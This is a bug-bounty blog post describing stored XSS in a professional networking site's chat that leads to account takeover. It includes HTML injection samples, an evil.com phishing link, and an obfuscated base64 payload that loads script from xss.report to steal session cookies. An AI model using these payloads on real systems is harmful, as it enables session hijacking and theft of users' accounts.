.png)
2 hours ago
5 BOOK THIS SPACE FOR AD
ARTICLE ADLet me take you on an exciting journey of how I uncovered a massive security flaw in a professional networking platform, similar to LinkedIn, and turned harmless chat messages into a devastating account takeover exploit! 😱
I stumbled upon redacted.com, a big-name and famous company in the networking space. It offered features like:
Professional profile creationPosting updatesConnecting with othersAnd surprisingly, messaging anyone, even if you weren’t connected!This was unlike LinkedIn, where messaging is restricted unless you’re connected or a premium member. My hacker instincts tingled! Was there a flaw in this “open” messaging system? Time to find out! 😏
To test the waters, I created two accounts:
Account 1 (Attacker): My hacker persona.Account 2 (Victim): The target for my experiments.I began testing the platform’s chat system by sending basic HTML payloads from Account 1 to Account 2. Here are a few examples:
Image injection<img src="https://example.com/hacker.jpg">2 .Phishing link
<a href="https://evil.com" style="color: red; font-size: 20px;">Click here to win $25!</a>Iframe injection"><iframe src="https://www.cia.gov" style="border:0; width:100%; height:100%;"></iframe>Result? 🎉 Everything worked! The platform rendered my raw HTML payloads without sanitizing them. This was critical because it meant the system wasn’t protecting against malicious inputs.
Next, I decided to test for stored XSS. Stored XSS occurs when malicious scripts are saved on the server and executed whenever a user interacts with the vulnerable page.
Here’s the payload I tried:
<img src/onerror=prompt(document.cookie)>Here’s what happened:
When Account 2 opened the chat, the payload executed, triggering a pop-up showing the victim’s cookies. 🍪Even Account 1 (the sender) would see the XSS pop-up upon revisiting the chat.This confirmed the presence of a stored XSS vulnerability in the chat system. But I wasn’t going to stop here. The real goal? Full account takeover.
I crafted a blind XSS payload to escalate the attack. This payload would steal the victim’s session cookies and send them to my server for exploitation. Here’s what I used:
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2xvcmRvZmhlYXZlbjEyMzQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>How It Played Out:
I sent the payload from Account 1 to Account 2 via chat.When Account 2 opened the chat, the payload executed in their browser.The payload sent Account 2’s session cookies to my endpoint on xss.report.Using those cookies, I logged into Account 2 without needing their credentials.BOOM! 💥 Account takeover achieved.
This vulnerability was catastrophic. An attacker could:
Hijack any user’s account by simply sending them a malicious chat message.Automate the attack to compromise thousands of accounts in minutes.Platforms like redacted.com are trusted by professionals, and such a flaw could seriously harm their reputation.
I discovered and reported this vulnerability over six months ago to redacted.com . I even followed up via email. Unfortunately, I never received any response.
As a bug bounty hunter, I value platforms that take security seriously. However, the lack of action here left me disappointed. I decided to share my findings through this article to help the community learn and to emphasize the importance of addressing security issues promptly.
This was my first Medium article, and I hope you found it insightful! 🙌
Discovering and exploiting vulnerabilities like these remind us how small oversights can lead to significant security risks. Let me know your thoughts in the comments, and feel free to share any similar experiences you’ve had!
Would love your feedback, especially since this is my first-ever article! 😊
Bengali (Bangladesh) · 
English (United States) ·